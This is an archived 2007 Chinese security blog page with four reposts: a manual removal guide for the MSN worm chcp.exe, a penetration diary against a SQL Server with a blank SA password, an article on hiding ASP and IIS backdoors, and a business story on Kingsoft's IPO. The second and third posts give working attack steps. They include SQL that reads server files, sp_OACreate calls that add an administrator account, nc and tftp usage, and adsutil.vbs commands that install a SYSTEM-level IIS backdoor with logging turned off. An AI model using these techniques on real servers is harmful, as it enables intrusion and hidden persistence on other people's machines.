• 2007年10月29日

    手动清除 chcp.exe病毒 保护 MSN的安全 - [安全资讯]

    手动清除 chcp.exe病毒 保护 MSN的安全

    随着即时通讯工具的强大,木马病毒也加快了脚本,MSN早就成为了其通向第三方计算机感染跳越的平台。在好友圈中,只要盗取一个MSN好友帐号或感染一台用户计算机,病毒即会伸出罪恶之手,将会在用户MSN聊天时发送病毒信息。

    病毒分析

    该病毒属于MSN蠕虫变种,被感染的计算机会自动向MSN联系人发送诱惑文字消息和带毒压缩包,当对方接收并打开带毒压缩包中的病毒文件时,系统即成为新的受害者,并因此尝试感染另一台计算机。病毒大小为434,176 字节,通过MSN聊天工具进行传播。

    被感染的计算机,病毒首先会在系统目录 %Windows%下生成含带病毒源体的F0538_jpg.zip压缩包,随后病毒自身开始在计算机中的%Windows%目录下创建副本chcp.exe 可执行文件,并在注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]分支下建立"chcp.exe"="%Windows%\chcp.exe"自启动项目,然后病毒开始修改注册分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]下的"SFCDisable"=dword:ffffff9d 和"SFCScan"=dword:00000000值,进行关闭系统文件保护,并且更改 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]分支下的 "WaitToKillServiceTimeout"=的值为"7000",达到更改自动关闭进程等待时间的效果。

    完成上述后,病毒仍没有安静的等待,而是查找被感染的计算机中是否存在FTP目录,如果有则将原正常程序改名为backup.ftp、backup.tftp并复制到%System%\microsoft目录下,随后在系统目录%System%下写入ftp.exe、tftp.exe、dllcache\tftp.exe、dllcache\ftp.exe可执行程序,做完一系列的手脚,病毒开始向MSN联系人发送诱惑型文字消息,并夹带毒包F0538_jpg.zip欺骗用户打开。

    清除方法

    中了此毒的用户也不要紧张,在了解了生存原理后要想清除该病毒也非难事,只要按照以下几个步骤实施即可将病毒清除出界,让系统中的MSN正常运行。

    一、首先要进入注册表分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下,将"chcp.exe"="%Windows%\chcp.exe"自建的随机启动项删除,完成后重启计算机。

    二、进入%Windows%\目录下将病毒源体文件chcp.exe及F0538_jpg.zip压缩包删除。

    三、将目录%System%下的FTP破坏代替程序ftp.exe、tftp.exe、dllcache\tftp.exe、dllcache\ftp.exe删除,并将%System%\microsoft目录下的backup.ftp、backup.tftp改回到目录%System%下。

    四、删除注册表分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]下的"SFCDisable"=dword:00000000键值,恢复系统文件保护。

    五、最后将注册表[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]分支下的"WaitToKillServiceTimeout"=改为"20000" 从而恢复系统自动关闭进程等待时间的默认配置。

    笔者按:在MSN病毒中变体有很多种如:MSN机器人、MSN小丑、MSN性感相册等,其原理都是利用MSN作为平台在同聊友沟通的同时发送病毒信息,通过MSN好友关系欺骗用户点击,然后再次传播,从而形成强大的传播途径。为了更好的处理此类病毒,这里建议用户加强计算机的先期保护如:开启杀软定时升库,安装安全类软件,不定期打入系统补丁等,并且多了解每日病毒动态,即时作好防范工作即可,一但用户被感染时应立即作出回应,利用手工删除或下载相应的专杀工具进行清理,以免让更多的用户成为受害者。

    珊瑚虫案引发热议 网友呼吁11月1日集体抵制QQ

    作者:林丰蕾 | 出处:搜狐IT

      而有消息人士透露,为了解救被捕的陈寿福,网友们正在有计划地进行线下的实际行动营救,包括法律援助和在某些公开场合通过挂条幅、贴标语等形式声援陈寿福。

      在珊瑚虫工作室策划,一个网址为http://www.helpsoff.com,名字为“救助Soff”的网站也得到了网民的极大关注。在这一网站上,支持陈寿福的网站数目达到199个,声援的网友达到几万名,仅声讨QQ、支持珊瑚虫的留言就接近9000条。

      与此同时,在天涯等多个社区之上,都有网友发出呼吁——“号召所有网友11月1日不用QQ,进行集体抵制”。也有网友认为,除了在这一天不用QQ外,还应当和号召周围所有的朋友不用QQ,并坚决抵制QQ的其他收费业务。

      不过在这些议论当中,也有极少数网友认为陈寿福的被捕是理所应当的。

      据悉,腾讯公司在2006年初对陈寿福提出了起诉,2006年12月,北京海淀区人民法院判决珊瑚虫QQ侵权,赔偿腾讯经济损失10万元。今年9月29日,珊瑚虫QQ作者陈寿福在深圳被拘的视频在网上引起轩然大波。当时有消息称,腾讯公司曾以“办公场所搬离深圳”为威胁,要求深圳市政府、深圳市公安局到北京抓捕珊瑚虫作者陈寿福。

      而腾讯总裁刘炽平曾向搜狐IT表示,珊瑚虫作者被抓完全与腾讯无关。
    Tag:病毒 MSN 安全 杀毒 珊瑚虫
    chapi 发表于22时05分00秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2007年10月29日

    SQL Server SA空口令的渗透测试日记 - [安全资讯]

    SQL Server SA空口令的渗透测试日记

    作者: 小王 出处:51CTO.com

    前几天朋友找我,让我帮忙测试一下他们的服务器,经过扫描后发现SQLServer的SA为空,决定利用这个漏洞做渗透测试。经过测试发现存储过程Xp_cmdshell以及读取注册表系列的存储过程都被删除了,并且Xplog70.dll也被删除,所以无法执行CMD命令和克隆管理员帐号了,看样子是经过安全配置的,这种情况据我当时掌握的知识是没办法入侵的。以前也遇到过类似的机器,所以决定利用几天的时间解决这个问题。

    经过两天的查阅资料和测试,实现了不需要使用任何SQLServer自带的存储过程就可以从目标机上得到txt、asp等类型文件的内容(前提是知道SA密码或者SA密码为空),实现过程就是自己建立一个临时表,然后将文件读到表中,再用SELECT语句得到返回值,即文件的内容。我们可以在查询分析器里先写入一个存储过程,然后执行,在需要的时候只要调用该存储过程即可:

    Create proc sp_readTextFile @filename sysname

    as

    begin

    set nocount on

    Create table #tempfile (line varchar(8000))

    exec ('bulk insert #tempfile from "' + @filename + '"')

    select * from #tempfile

    drop table #tempfile

    End

    go

    这样我们只要执行类似下面的语句就可以得到指定路径下文件的内容:

    exec sp_readTextFile 'c:\aaa.asp'

    实现这个功能后,本打算通过读取朋友服务器上网站的asp代码,做进一步的入侵,可是后来发现,因为不知道网站asp文件的绝对路径,所以这个功能根本用不上,只好作罢,另找其他方法。在这之后的几天时间里,我想到了使用安全文章经常提到OLE相关的一系列存储过程,这一系列的存储过程同Xp_cmdshell以及读取注册表系列的存储过程一样危险,但是其使用方法不象那些存储过程在网络上和书上介绍的那样多,这系列的存储过程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop,下面我讲一下通过查阅资料得到的使用方法:

    打开查询分析器,然后使用SA与目标机连接上,在查询分析器里执行:

    DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC

    SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user

    ceshi 1 /add'--

    这样对方系统增加了一个用户名为ceshi,密码为1的用户,再执行:

    DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC

    SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup

    administrators ceshi /add '--

    用户ceshi,被加入管理员组。

    总结:通过这次渗透测试,又学到了一种利用存储过程控制SA为空的SQLServer服务器的方法。

    几款黑客常用小工具的使用说明

    Nc

    Nc(Netcat的简写)被称为”瑞士军刀”,是黑客工具箱必备的工具之一,可见其功能之强大。Nc的功能与windows系统中的telnet.程序类似,但是Nc更为强大,功能更多,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)连接,可以在这些连接上读写数据,直到连接关闭为止,通俗的讲就是可以用它来连接我们指定的机器的端口。下面介绍几种Nc常用的命令格式:

    (1)nc 192.168.0.1 1234  连接Ip地址为192.168.0.1计算机的1234端口;

    (2)nc –l –s 1234  监听本机的1234端口;

    (3)nc –vv 192.168.0.1 1234  刺探Ip地址为192.168.0.1计算机的1234端口是否开放。

    Tftp

    Tftp(Trivial File Transfer Protocol)是一种基于UDP连接的文件传输,一般是使用Windows系统自带的tftp.exe和一个Tftp服务器端软件构成一个完整的传输结构,它具有Ftp的文件传输能力,但是不具有任何安全性。它是这样使用的:运行本地的TFTP Server(比如tftpd32.exe)软件并保证始终开启直至传输全部完成,在另一方执行Tftp命令。执行命令格式:

    tftp -i 127.0.0.1 put test.exe,该命令是将test.exe上传到127.0.0.1计算机上;

    tftp -i 127.0.0.1 get test.exe,该命令是从127.0.0.1下载test.exe。

    通常黑客在获得目标计算机的一定权限后会使用Tftp把一些文件传到目标计算机上,如图1所示。



    图1 Tftp服务器端程序界面

    WSockExpert

    WSockExpert是一个抓包工具,它可以用来监视和截获指定进程网络数据的传输,并可以用来修改网络发送和接收数据,程序界面如图2所示。



    图2 WsockExpert程序界面

    Achilles

    Achilles是一个设计用来测试web应用程序安全性的工具。它是一个代理服务器,运行后会占用本地计算机的5000端口,在一个HTTP会话中扮演着“中间人”(man-in-the-middle)的角色。一个典型的HTTP代理服务器将在客户浏览器和web服务器间转发数据包,但Achilles却载取发向任一方的HTTP会话数据,并且在转发数据前可以让用户修改这些数据,这也就为我们理解HTTP会话原理提供了帮助,黑客利用这个工具可以修改数据包,进行类似Cookie欺骗的活动。我们浏览某些Web站点时,这些站点会在你的硬盘上用很小的文本文件存储了一些信息,这些文件就称为Cookie。Cookie主要的用途就是为了方便网友下次访问网站时不需要输入自己的用户名和密码。只要对用户的Cookie进行改写就可以达到Cookie欺骗的目的。

    Achilles的使用方法:在Internet Explorer中将代理服务器的IP地址设置为127.0.0.1,端口为5000,如图3所示,然后到Achilles中,把Intercept Modes中的第1,2,5选项选中,再单击程序中的Start Proxy图标(三角形) ,就可以获取本地计算机的HTTP数据包了。如图4所示。



    图3

    在Internet Explorer中将代理服务器的IP地址设置为127.0.0.1,端口为5000

    Click here to open new window CTRL+Mouse wheel to zoom in/out

    图4 Achilles的运行界面
    Tag:SQLServer SA 渗透 黑客
    chapi 发表于22时02分42秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2007年10月29日

    ASP后门的放置方法的深入研究 - [安全资讯]

    ASP后门的放置方法的深入研究

    作者:Lcx  来源: 黑客X档案

    传在肉鸡上的asp网页后门,即使你改变了原有代码变量,躲过了杀毒软件,但是细心的管理员也会发现在他网站web目录下会多出一个asp文件。针对这个问题,我想了两个办法,一种是asp Injection(好像这个词真流行呀);一种是在iis管理器中用asp.dll来解析任意后缀名。这两个方法并没有多少技术性可言,却是一个很好的思路。如果沿着这一思路进行更深层的思考,就可以配置一个奇妙的iis后门了。详述如下:

    asp后门放置方法之一asp Injection。先看图一:



    这是我架在本机的一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。 再看第二个图:



    比较一下:

    图1的url是http://192.168.1.3/asp/wz/admin.asp

    图2是http://192.168.1.3/asp/wz/admin.asp?id=1,在admin.asp后边加了一个参数"?id=1"就多出一个东东来了。图2下面这两个框,你可以在前边的输入框里输入文件名,后边的文本框可以复制你要的任意代码,点生成按扭可以生成在服务器上生成cgi/asp/php/aspx等网页后门或任意文本文件。这是怎么做到的呢?只要你将这段代码根据提示修改一下插入某个asp网页代码最下端即可。

    值得注意的是这段代码要求服务器支持fso,并且它不是在所有的asp文件里都生效的。像被插入的asp文件有包含代码,即有这样的代码,这段代码就不生效了,但不会影响原文件的使用。如果你会写asp,你还可以将一些asp后门直接写在肉鸡原有的asp文件里。

      asp后门放置方法之二在iis管理器中用asp.dll来解析任意后缀名。这样来做,依次打开电脑的控制面板-管理工具-Internet 服务管理器-web站点-右键属性-主目录-配置-添加。我添加了一个后缀为lcx的文件映射,用nt\system32下的asp.dll来解析。像图3:



    这样做完以后,我们把常用的cmd.asp改名为cmd.lcx,然后运行,你看会发生什么? 图4:



    一样是一个网页后门。当然,起个什么后缀显得更隐蔽,看你的聪明才知智了。

    asp后门放置方法之深入研究。我刚才是用了asp.dll来解析后缀为lcx的文件。如果我们用一个特殊的dll程序来解析.lcx的后缀呢?如果你会编程,当然可以根据自己的需要写一个dll程序。不会呢?哈,绿盟袁哥已经为我们写好了。想到了没有,就是那个idq.dll呀,可以传在scripts目录下用ispc来连接的idq.dll。U漏洞里提升权限常用的。现在我经用这个idq.dll按asp后门方法之二做好映射了,那么会发生什么呢?可以用它做两件事。一种是可以通过执行http://targetip/anything.lcx来在对方主机上加一个名为iisuser,密码为abcd1234的用户。图5:



    这个xxx.lcx可以随便改名,主机不存在这个文件也可以。如果你还不满足,我们用nc登陆主机看看。键入如下命令。nc targetip 80

    post /%08/ anything.lcx,怎么样?登陆上去了吧,在w2k+sp3下它可是system权限呀。图6:



    原理在这儿限于篇幅我就不讲了,你可以上绿盟查查tombkeeper pgn写的IIS配置文件后门这篇文章。网友czy也写了一个同样的dll程序,用法就是在ie中执行http://ip/*.你设写的后缀?shell=你要的命令。看一下我用它在肉鸡上做的后门吧,我是用它来解析.ph4的后缀。图7:

    看到这里,你可能要说了,这个iis后门在3389终端里安装很方便,在命令行下呢?我们也有办法。iis默认安装下,会在/inetpub/adminscripts目录下生成19个vbs脚本,我们用其中的一个adsutil.vbs就可以帮我们装上这个奇妙的iis后门了。

    运用方法如下,我们分8步走,看看命令行下的快乐吧:

    1 copy idq.dll %systemroot%\system32\iisapi.dll

    将idq.dll copy到系统盘的system32目录下,重命名为iisapid.ll

    2得到虑拟站点的情况

    cscript adsutil.vbs enum /p /w3svc

    [/w3svc/Info]

    [/w3svc/Filters]

    [/w3svc/2]----------->这些就是拟虚拟站点了

    [/w3svc/3]

    [/w3svc/4]

    [/w3svc/1]

    3 得到IIS所有的有特权的DLL

    adsutil.vbs set /W3SVC/InProcessIsapiApps

    运后后查得如下dll

    "C:\WINNT\System32\idq.dll" "C:\WINNT\System32\inetsrv\httpext.dll" "C:\WINNT\System32\inetsrv\httpodbc.dll" "C:\WINNT\System32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll"

    4.把得到IIS所有的有特权的DLL和将第1步copy过来的iisapi.dll设到InProcessIsapiApps组中,这样我们的后门就有了LOCAL_SYSTEM权限。这步中要将第三步查到的dll都加在这里,如果你不加的话,原有特权在dll就会被删除。

    cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\System32\idq.dll" "C:\WINNT\System32\inetsrv\httpext.dll" "C:\WINNT\System32\inetsrv\httpodbc.dll" "C:\WINNT\System32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll" "C:\WINNT\System32\iisapi.dll"

    5.设置映射

    cscript adsutil.vbs set /w3svc/scriptmaps

    ".asp,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"

    ".cer,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"

    ".asa,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"

    ".idc,C:\WINNT\System32\inetsrv\httpodbc.dll,1,OPTIONS,GET,HEAD,POST,PUT,delete,TRACE"

    ".shtm,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"

    ".shtml,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"

    ".stm,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"

    ".lcx,C:\winnt\system32\iisapi.dll,3,GET,HEAD,POST"

    这里是默认安装下,在原有iis管理器中的映射加了一个.lcx的映射,用我们copy过来的iisapi.dll来解析,注意最后一行加的是.lcx的映射,你可以加个别的后缀名映射。

    6.增加一个虚拟目录,设置虚拟目录的各项属性

    cscript adsutil.vbs create /w3svc/2/root/root (目录名叫root)

    cscript adsutil.vbs set w3svc/2/root/root/KeyType "IIsWebVirtualDir"

    cscript adsutil.vbs set w3svc/2/root/root/AppRoot "/LM/W3SVC/2/Root/root"

    cscript adsutil.vbs set w3svc/2/root/root/AppFriendlyName "root"

    cscript adsutil.vbs set w3svc/2/root/root/AppIsolated 2

    cscript adsutil.vbs set w3svc/2/root/root/AccessRead True

    cscript adsutil.vbs set w3svc/2/root/root/AccessExecute True

    cscript adsutil.vbs set w3svc/2/root/root/AccessScript True

    7.增加虚拟目录root的映射.lcx,用iisapi.dll来解析

    cscript adsutil.vbs set w3svc/2/root/root/ScriptMaps ".lcx,C:\winnt\system32\iisapi.dll,1"

    8 不进行日志记录

    adsutil.vbs set /w3svc/1/root/root/dontlog true

      需要说明的是adsutil.vbs 的命令虽然我是研究了好长时间才搞清楚的,但我用上述命令在三台肉鸡和我本机做试验时,只成功了两台。得到的结果好像是只有iis原有默认配置没有被修改的情况下才可以成功。为什么会这样,还是借杂志一角来期待研究过这个脚本和iis isapi的高手来解答吧,但在iis图形管理器中这个后门可是百分百成功。

      应当说,这三种方法置的后门可以说是目前最好的后门了。但是你要用肉鸡做什么呢?:-),看看我在本机抓的图吧,你会明白最好的肉鸡就是我们的电脑。便于大家学习,我将idq.dll、czy.dll、adsutil.vbs打包传在我网站,

    下载url是http://www.haiyang.net/safety/htm/iisback.rar
    Tag:ASP 后门 黑客
    chapi 发表于21时44分54秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2007年10月29日

    金山:一个符号19年的起起落落 - [IT业界]

    2007年10月9日,金山,这家以激情和顽强著称的 中国软件企业在香港联交所上市了.为了这一刻,她等待了8年之久.

    在中国软件业,似乎很少有一家企业的发展过程总可以牵动公众的关注,似乎没有任何一家企业 的历程会如金山一般让人感慨万分.金山的发展见证了中国企业成长过程的艰辛和磨难,也见证了中国软件企业的顽强和不屈.现在,她要肩负着遍布全世界的投资者期待的目光,寻求一种更加轻盈、快乐的发展之路.这一个中国软件产业的符号能否如愿?中国软件产业能不能随着金山的成功而走向世界?

    金山的发展几乎和中国软件产业的发展同步.1988年,一个叫求伯君的年轻人独自憋在房间里14个月,用一台386的电脑和三次肝炎的代价,写出了中国第一款文字排版软件WPS.

    其时也正是中国软件产业刚刚起步,开始百花齐放的时代:WPS、UCDOS、中文之星、五笔输入法……硬件产业尚处于萌芽时期的中国计算机产业,迅速迎来了众多在国际上也属先进的软件产品和程序员个人英雄.

    此后6年,金山的WPS几乎占据了所有的中文文字处理软件市场,并且成为一代人对计算机的认识.DOS环境下的计算机,一开机直接进入的就是WPS的界面.一种有趣的说法是:当时买电脑的都是单位,单位买了电脑都用来打字,打字都用的WPS.全国各地,当时依赖WPS的打字店达到4万多家,书店里各种WPS 的教程超过100本.求伯君也理所当然的被称为中国第一程序员.

    金山的成功见证了那个激动人心的中国软件产业迅速发展的年代:通过个人的奋斗和知识的力量来改变命运,成为人们崇拜的英雄,并同时推动中国科技产业的发展,激励了无数人投身这个行业.

    1996年:中国软件的冬天

    好景不长,先天不足的中国软件产业,尽管后天颇为努力,却没有获得更多的夯实基础的时间和空间.1996年的到来,结束了中国软件百花齐放、百家争鸣的局面,也成为中国软件整整一个产业的发展拐点.

    首先是来自跨国公司巨头的竞争.1994年,微软进入中国;经过两年的发展,微软已经成功依靠对待中国市场的独特营销策略俘获人心.毫无防备的金山甚至和微软达成一个协议,允许微软的中文Word通过中间程序和占据市场份额超过90%的WPS兼容.在微软的竞争下,短短两年的时间里,WPS便丢城失地,一溃千里.

    同时,由于硬件的发展,CPU计算速度不断提高和光驱的出现,盗版软件变得唾手可得,中国软件业遭到了除跨国公司外的另一重创—— 盗版的侵袭.而这对于尚处于幼年期的中国软件产业,无异于灭顶之灾.1996年,大量的软件公司倒闭.前些年那种热热闹闹、风风火火的创业情形不再出现,金山也在那一年里进入了创办以来的第一次低谷.

    不断转型  艰难求生

    低谷中的中国软件产业,几乎丧失了所有的动力,硕果仅存的几家企业也无不是在苦苦挣扎.对于中国软件企业来说,除了放弃,就只能够不断地转型,寻找自己的生存之路.

    1996年,金山转型工具软件求生,推出金山影霸,随后推出金山词霸、金山快译.在不断转战各种不同类型软件的同时,金山也开始尝试在营销上不断探索,求得生存之道.1998年,金山举办“秋夜豪情”金山词霸3.0发布会,首度尝试IT业和娱乐明星互动营销,获得强烈反响;1999年,金山开始为期三个月的“红色正版风暴”,用28元的低价卖出了110万套正版软件,在昂贵的进口软件和廉价的盗版软件夹缝里,创造出了中国软件至今无人打破的奇迹.

    2000年,金山推出杀毒软件,这种不断转战的过程,实际上就是中国软件不断寻求突破,寻求生存空间的努力.

    海外寻梦  国际化的排头兵

    2002年以后,中国软件产业开始有回暖迹象,一批国产软件企业开始高速发展,走上重新崛起之路.获得了第二次发展契机的中国软件也开始了国际化的探索,用友、金蝶、金山等软件公司先后把自己的软件产品打入国际市场.

    金山在国内也最早一步实现了国际化发展路线的探索.早在1997年,金山就把游戏产品《月影传说》卖到了台湾、马来西亚等地区和国家.随后几年,雷军带着团队考察过近20个国家的市场情况.中国软件的国际化梦想一直贯穿在金山发展的每一步之中.

    2005年,金山开始大规模实施国际化战略,日本市场成为金山进军国际的试金石和桥头堡.一年后,金山毒霸获得200万用户,在强手如林、全球12款最顶尖杀毒软件竞争激烈的日本市场取得排名第五的好成绩.金山的国际化道路以一种良好的开端打开了局面.

    同时,金山进入越南的网络游戏软件《剑侠情缘网络版》自2005年发布以来,成功将越南MMORPG网游市场容量拉升20倍,使其从一万人在线的市场规模达到目前接近30万人在线的市场容量,剑网也获得了80%左右的市场份额,直至接近垄断的地位.金山软件做世界一流的中国软件企业的目标也在一步一步实现.

    上市,一个新的拐点

    2007年10月9日,金山在香港联交所主板上市(股票代码:3888HK).

    这家中国软件业的鼻祖,终于在自己和众人期盼了8年之后,上市了.雷军异常的平静,不平静的是联交所大屏幕上一路朝东北前进的曲线和跳跃的数字.一周之内,金山软件已从3.6港币的发行价升至6港币左右,增幅超过50%.面对无数的鲜花和掌声,面对“程序员富豪团”的光环,金山接下来该如何走?会不会像外界传闻的那样主要偏重于网络游戏的发展?融资后的几个亿港币该如何花?

    针对这种状况, 广发证券分析师认为,金山软件股票在配售和挂牌后走势良好,其二十年在国内软件行业的技术积累十分深厚,从长远来看,有望成为明星型股票,具备较大投资价值.对于科技企业来说,概念只是一时之计,技术是支撑股票持续走高的最大动力.

    该分析师表示,中国在海外上市的众多科技企业中,因为技术出众,不乏表现突出者,例如百度.金山在国内软件业研发上拥有豪华的阵容和资源,据此前招股书显示,截至到2007年8月31日,其研发人员已经达到997人,目前已突破千人,占到整体雇员的60%以上,在国内技术研发上属于顶尖的团队.金山未来的发展将会受惠于其对技术的高额投入.而这些将深刻影响到金山在股市的表现.

    二十年不衰,深受技术积累之惠

    和金山同期的国内软件企业,自1988年以来,存活下来的已经凤毛麟角.而金山在发展过程中,也曾碰到过同样的恶劣环境和发展瓶颈,最终依靠对软件研发技术的坚持渡过了难关,东山再起,并且发展越来越好.

    业内人士表示,研究金山的历程可以发现,金山一旦寻找到市场容量巨大的市场,每次都可以组织出精干的研发队伍,在短时间内取得很大的突破.在从办公软件到工具软件,从工具软件到杀毒软件,从杀毒软件到网络游戏软件的不断转型过程中,在最困难的技术问题上,金山总能顺利过关.这实际上是受惠于二十年技术积累的结果.

    该人士表示,新股排队上市,给投资者更多的选择,同时,对投资者的投资眼光也提出了挑战.投资业内人士会有一个比较成型的标准,就是不论哪种行业,投资一定要选择厚积薄发型的企业,这种企业基础扎实,发展稳健,不仅仅投资风险较低,并且长期持有,一般都可以获得巨大的回报.

    金山总裁兼CEO雷军表示,上市后,金山将继续扩大研发团队.计划在1~2年的时间里,将毒霸的研发团队扩大一倍,同时必须不断提高客户服务的水平.据金山上市公告中显示,金山将投入上市募集资金中的0.941亿港元,用于增加网游服务器,购买软硬件提升收费系统和网络分销平台,另有部分资金用于拓展金山应用软件业务的研发能力.以技术立业是多年来金山一直坚持的原则,伴随着上市,金山已经有足够的资本来增强自身的研发实力.

    面对上市后的疑问,雷军说:金山上市,软件的舞台不会谢幕.

    软件的舞台不会谢幕

    相比于网游产品的不确定性,金山的应用软件业务已经相对成熟,今年年初将两大事业部进行有效整合之后,已经稳健高速增长.WPS在2005年推出革命性的新版本WPS Office 2005和今年9月份推出WPS Office 2007之后,用户数和销售额一直高速增长.金山毒霸自转型网络营销后,线上订购用户量也节节攀升,在不知不觉中市场份额获得大幅度增长,据此前金山的招股书显示,截至2006年底,订制金山毒霸杀毒服务的用户达到560万.

    此外,受惠于中国软件正版化环境的逐步改善,金山的软件业务也将获得一个比较好的发展契机.

    对于有没有可能放弃软件业务,雷军回答说:“金山借助网游概念上市只是投资者的误解,其实金山是软件业务整体打包上市.由于盛大、九城等网游公司成功上市,造成网游概念很热,投资者纷纷关注.尽管网游产品的收入占金山总体收入的大部分,但是金山软件业务在整体收入已占到三分之一多,并不是很低.而且从长远发展来看,软件业务在未来给金山带来的收入很可能会超过网游.”

    雷军对WPS的前景充满信心.随着人们正版意识的提高,WPS的未来有多大的上升空间还是一个巨大的未知数.对于金山毒霸,雷军更显得踌躇满志.

    8月份,金山毒霸率先通过VB100国际权威认证,打破了国产杀毒软件集体缺席VB100的尴尬;而此次金山上市,又让金山毒霸成为了国内首个具有上市公司背景的杀毒软件.

    从1997年至今,金山毒霸已走过了10个年头.在这个更新速度非常快的IT行业,一个产品能够存活十年并不是件容易的事情.从蓝芯引擎到VB100,金山毒霸有过辉煌,也走过低谷,但从2005年开始,金山毒霸无论从产品还是服务等方面表现都非常不错,也赢得了很多口碑.

    肩负着众人希望的金山,将继续在软件的道路上耕耘、前行,当然也不会落下为金山的壮大立下汗马功劳的网游软件的业务.

    雷军的八年

    在金山完成上市后的第一时间,本刊专访了金山总裁兼CEO雷军,揭密金山上市“八年抗战”中的甜酸苦辣以及金山未来的发展.

    八年等一回

    “为这个时刻,我们跑了八年时间.从此以后,我再也不用回答'金山什么时候上市'这种烂问题了.”完成上市之后再见媒体,雷军“抱怨”得十分痛快,但激情和“爽”劲儿依旧.

    “其实金山上市的这个过程真的很不容易,历经八年,正常人都会被折腾成神经分裂,更不要说中间经历的坎坎坷坷了.”此时的雷军回忆起“八年上市路”,似乎多了些淡定和幽默,少了些辛酸和无奈.

    上市对于很多公司来说,只是6~12个月的冲刺,而金山却在这条路上走了有些匪夷所思的八年,而且辗转在五个市场进行尝试,其中有三个已经进入实质性的操作阶段.

    “一个公司上市搞八年的不多,搞了八年还没有垮掉的更不多.”雷军说,“上市意味着审计费、律师费、中介机构成本等巨额的投入,每准备一次都要投入很多钱.更重要的是,上市意味着你在投资策略上和业务策略上要尽可能保守和谨慎,特别是高管的时间和精力要大量的投入进去.所幸我们没有垮掉,而且笑着跑到了终点.”

    1999年前后,金山内部就开始讨论在香港上市的可能性,因为当时内地IT企业大多选择在港上市.但由于受到亚洲金融危机的影响,整个亚洲股市都非常低迷,香港创业板市场上只有三四家公司的股价在IPO价格之上.经过慎重考虑,金山第一次的上市冲动就此夭折.

    2000年9月,由于有国内可能开放创业板的消息,金山也将上市的目光转向国内,希望登陆当时还在酝酿中的创业板或A股市场,并且已经进行到了实质性操作阶段.但后来,由于受法律方面等客观原因的限制,金山登陆国内市场的想法也搁浅了.

    “2003年取消国内上市后,我们准备了8000万人民币,决心孤注一掷,把网游拿下.”雷军回忆说,“03年是我们唯一亏损的一年,因为当时真的豁出去了,狂轰烂炸般的投广告、做市场推广.”

    2004 年,由于网游业务大获成功,金山也进入了一个高速发展期,于是上市的冲动再次萌发.这次,金山将目光转向美国纳斯达克,当时纳市的目光正在热烈追捧着网络游戏概念股.但2006年突然颁布“萨班斯法案”等一系列企业准入审查制度,大大提高了中国企业去美国上市的门槛,金山被挡在门外.

    2006年8月,金山成功获得来自GIC(新加坡政府直接投资的全球性投资管理公司)、英特尔投资和新宏远创基金三家风险投资机构的7200万美元风投,启动香港主板上市,这次终于得到了一个完满的句号.

    “到今天为止,在中国,有任何一家面对消费者的通用软件公司上市吗?没有.金山是第一家.”雷军说.

    最年轻的老革命

    “1992年1月4日,我加入金山,到现在差几个月就干了16年了.”雷军清楚的记得自己的金山岁月.在这十六年里,雷军完成了一个从刚毕业的大学生到优秀的程序员、再到公司CEO的蜕变过程.

    1992年,雷军加入金山工作,并迅速成为一个非常优秀的程序员.那时,雷军万万也没有想到自己后来会成为上市软件公司的“C什么O”,而不是中国最优秀的程序员.

    金山的上市重新把人们的目光吸引到这位既熟悉、似乎又好久不见了的“老革命”身上.和上市直接相关的一项就是财富.只要有公司上市,猜测老大们的身价和公司百万富翁的数量已经是媒体和业界“常规项目”了.

    雷军当然也未能幸免,关于他的个人财富,目前已经有3亿到11亿不等的多个版本.倒是雷军本人,对此似乎很不屑一顾.

    “我真的没有算过,那都是paper money(纸上财富),”他说,“我和求总都很难卖的,陈天桥卖了那么多年,才卖了那么一点儿.”雷军的话倒也实在,顺带幽默了一把.

    根据金山上市时向香港联交所提供的《招股说明书》显示,金山董事会主席求伯君拥有公司股份21949万股,占20.7%;而首席执行官雷军拥有15823万股,占14.7%.金山目前的股价在5港元左右,雷军的身价在8亿元港币左右,当然这些都是理论上的数值.

    雷军今年37岁,在业内早就已经被称为“最年轻的老革命”,用雷军的话来说,他“从十八九就开始入道,混了快二十年来,什么都看破了.”雷军说,“今天非常成功,明天一塌糊涂,这样的事情我看得太多了,所以我的心态非常好.”

    软件情结与网游实惠

    外界看来,网游扮演着金山软件救世主的角色,至少从营收数字上看是这样.

    但是,无论是雷军还是金山的其他人,都不赞同这种说法,“金山是在通用软件市场上活下来的公司,网游帮助金山做大.”雷军反复强调.

    (但是不可否认,至少金山之所以成为今天上市的金山,网游是一颗最重要的棋子.)

    “金山做了网游以后,业绩保持每年高速成长,从04年开始,金山的年均营业额增长率达到68%.”雷军说,“如果没有网游的话上市可能会遥遥无期,虽然现在我们的软件业务也挺赚钱,就把我们软件业务单独看的话,也符合了上市要求.”

    根据金山软件公司向港交所递交的招股说明书,2006年,金山的娱乐软件(网游)营收占总营收的68.1%,而通用软件占31.1%.

